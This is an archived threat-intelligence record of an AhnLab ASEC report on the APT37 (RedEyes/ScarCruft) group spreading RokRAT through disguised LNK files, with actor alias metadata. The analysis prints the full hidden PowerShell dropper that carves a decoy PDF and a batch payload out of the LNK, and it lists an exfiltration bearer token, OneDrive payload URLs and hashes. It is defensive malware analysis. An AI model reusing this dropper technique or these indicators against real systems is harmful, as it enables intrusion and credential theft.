{ "id": "55c0365e-4416-4610-804b-c295510d91fc", "created_at": "2026-04-06T00:06:51.863673Z", "updated_at": "2026-04-10T03:38:06.367324Z", "deleted_at": null, "sha1_hash": "612d054ed65b18e5a453616528f852a652020e97", "title": "RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft) - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3052997, "plain_text": "RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes\r\n(ScarCruft) - ASEC\r\nBy ATCP\r\nPublished: 2023-04-20 · Archived: 2026-04-05 15:14:16 UTC\r\nAhnLab Security Emergency response Center (ASEC) confirmed that the RedEyes threat group (also known as APT37,\r\nScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month,\r\nhas also recently distributed the RokRAT malware through LNK files. RokRAT is malware that is capable of collecting user\r\ncredentials and downloading additional malware. The malware was once distributed through HWP and Word files. The LNK\r\nfiles that were discovered this time contain PowerShell commands that can perform malicious behavior by creating and\r\nexecuting a script file along with a normal file in the temp folder. The confirmed LNK filenames are as follows: \r\n230407Infosheet.lnk\r\nApril 29th 2023 Seminar.lnk\r\n2023 Personal Evaluation.hwp.lnk\r\nNK Diplomat Dispatch Selection and Diplomatic Offices.lnk\r\nNK Diplomacy Policy Decision Process.lnk\r\nThe “230407Infosheet.lnk” file is disguised with a PDF icon and contains a malicious PowerShell command.\r\nhttps://asec.ahnlab.com/en/51751/\r\nPage 1 of 6\n\nFigure 1. Properties of the LNK file\r\nThe LNK file contains not only a PowerShell command, but also the data of a normal PDF file along with malicious script\r\ncodes. Furthermore, there are dummy bytes that start from 0x89D9A all the way to 0x141702A.\r\nFigure 2. Dummy data that exists at the end of the LNK file\r\nThe PowerShell command that is executed through cmd.exe upon executing the LNK file is as follows: \r\n/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match ‘System32’ -or $dirPath -\r\nMatch ‘Program Files’) {            $dirPath = ‘%temp%’            }; $lnkpath = Get-ChildItem -Path $dirPath -\r\nRecurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty\r\nFullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00561396 -ReadCount 00561396; $pdfPath =\r\n‘%temp%\\230407정보지.pdf’; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002474)) -Encoding Byte; ^\u0026\r\n$pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00564634 -ReadCount 00564634; $exePath =\r\n‘%temp%\\230412.bat’; sc $exePath ([byte[]]($exeFile ^| select -Skip 00561396)) -Encoding Byte; ^\u0026\r\n$exePath;\r\nThe LNK file is read up to 0x890F4 and is saved and executed with the filename “230407Infosheet.pdf” in the Temp folder\r\nwhile excluding the first 0x9AA. Afterward, it reads up to 0x89D9A of the LNK file and is saved and executed in the Temp\r\nfolder with the filename “230412.bat” after excluding 0x890F4, which is the byte where the PDF data exists.\r\nhttps://asec.ahnlab.com/en/51751/\r\nPage 2 of 6\n\nFigure 3. PDF data located at 0x9AA of the LNK file\r\nFigure 4. Script code located at 0x890F4 of the LNK file\r\nFigure 5. Files created in the Temp folder\r\nThe threat actor executes a normal PDF file to make the behavior appear normal before carrying out their malicious\r\nbehavior through the script file.\r\nFigure 6. 230407Infosheet.pdf (normal file)\r\nhttps://asec.ahnlab.com/en/51751/\r\nPage 3 of 6\n\nThe script file executed at the same time contains the following PowerShell command that executes malicious commands\r\nwhich exist as HEX values.\r\nFigure 7. 230412.bat\r\nThe final PowerShell command that is executed downloads the encoded data from\r\nhxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSj\r\ndecodes it, and injects it into the PowerShell process to perform malicious behavior.\r\nFigure 8. Final PowerShell command that is executed\r\nFigure 9. Malicious file uploaded to OneDrive\r\nThe injected data is the RokRAT malware that is capable of collecting user credentials and downloading additional malware.\r\nThe collected information is sent to the threat actor’s cloud server using cloud services such as pcloud and yandex. The\r\nUserAgent in the request header is disguised as Googlebot. The certificate token used to send files is as follows: \r\nAuthorization: Bearer RSbj7Zk5IYK5ThSbQZH4YBo7ZxiPOCH94RBbFuU9c04XXVJg7xbvX\r\nThe additional normal files executed through the malicious LNK are as follows:\r\nhttps://asec.ahnlab.com/en/51751/\r\nPage 4 of 6\n\nFigure 10. April 29th 2023 Seminar.pdf created through April 29th 2023 Seminar.lnk\r\nFigure 11. 230402.hwp created through NK Diplomacy Policy Decision Process.lnk\r\nAs RokRAT has been in distribution for a while and is being distributed in various forms such as Word files, users are\r\nadvised to take extra caution. \r\nReddoor (RokRAT) Malware Analysis Report – May 9, 2022\r\nKorean APT Attacks Using Ruby Script Analysis Report – Apr. 7, 2021\r\n[File Detection] Dropper/LNK.Agent (2023.04.08.00) Downloader/BAT.Agent (2023.04.08.00) \r\nMD5\r\n0f5eeb23d701a2b342fc15aa90d97ae0\r\n461ce7d6c6062d1ae33895d1f44d98fb\r\n657fd7317ccde5a0e0c182a626951a9f\r\n8e5cac0159a31ea808973508ce164e1d\r\nhttps://asec.ahnlab.com/en/51751/\r\nPage 5 of 6\n\naa8ba9a029fa98b868be66b7d46e927b\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttps[:]//1drv[.]ms/i/s!AhXEXLJSNMPTbfzgUMxNbInC6\r\nhttps[:]//api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZE\r\nhttps[:]//api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQ\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner\r\nbelow.\r\nSource: https://asec.ahnlab.com/en/51751/\r\nhttps://asec.ahnlab.com/en/51751/\r\nPage 6 of 6\n\n https://asec.ahnlab.com/en/51751/ \nFigure 1. Properties of the LNK file \nThe LNK file contains not only a PowerShell command, but also the data of a normal PDF file along with malicious script\ncodes. Furthermore, there are dummy bytes that start from 0x89D9A all the way to 0x141702A. \nFigure 2. Dummy data that exists at the end of the LNK file \nThe PowerShell command that is executed through cmd.exe upon executing the LNK file is as follows: \n/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath-Match ‘System32’-or $dirPath-\nMatch ‘Program Files’) { $dirPath = ‘%temp%’ }; $lnkpath = Get-ChildItem-Path $dirPath-\nRecurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty \nFullName; $pdfFile = gc $lnkpath -Encoding Byte-TotalCount 00561396-ReadCount 00561396; $pdfPath =\n‘%temp%\\230407정보지.pdf’; sc $pdfPath ([byte[]]($pdfFile ^| select-Skip 002474))-Encoding Byte; ^\u0026\n$pdfPath; $exeFile = gc $lnkpath -Encoding Byte-TotalCount 00564634-ReadCount 00564634; $exePath =\n‘%temp%\\230412.bat’; sc $exePath ([byte[]]($exeFile ^| select-Skip 00561396)) -Encoding Byte; ^\u0026\n$exePath; \nThe LNK file is read up to 0x890F4 and is saved and executed with the filename “230407Infosheet.pdf” in the Temp folder\nwhile excluding the first 0x9AA. Afterward, it reads up to 0x89D9A of the LNK file and is saved and executed in the Temp\nfolder with the filename “230412.bat” after excluding 0x890F4, which is the byte where the PDF data exists.\n Page 2 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://asec.ahnlab.com/en/51751/" ], "report_names": [ "51751" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434011, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/612d054ed65b18e5a453616528f852a652020e97.pdf", "text": "https://archive.orkl.eu/612d054ed65b18e5a453616528f852a652020e97.txt", "img": "https://archive.orkl.eu/612d054ed65b18e5a453616528f852a652020e97.jpg" } }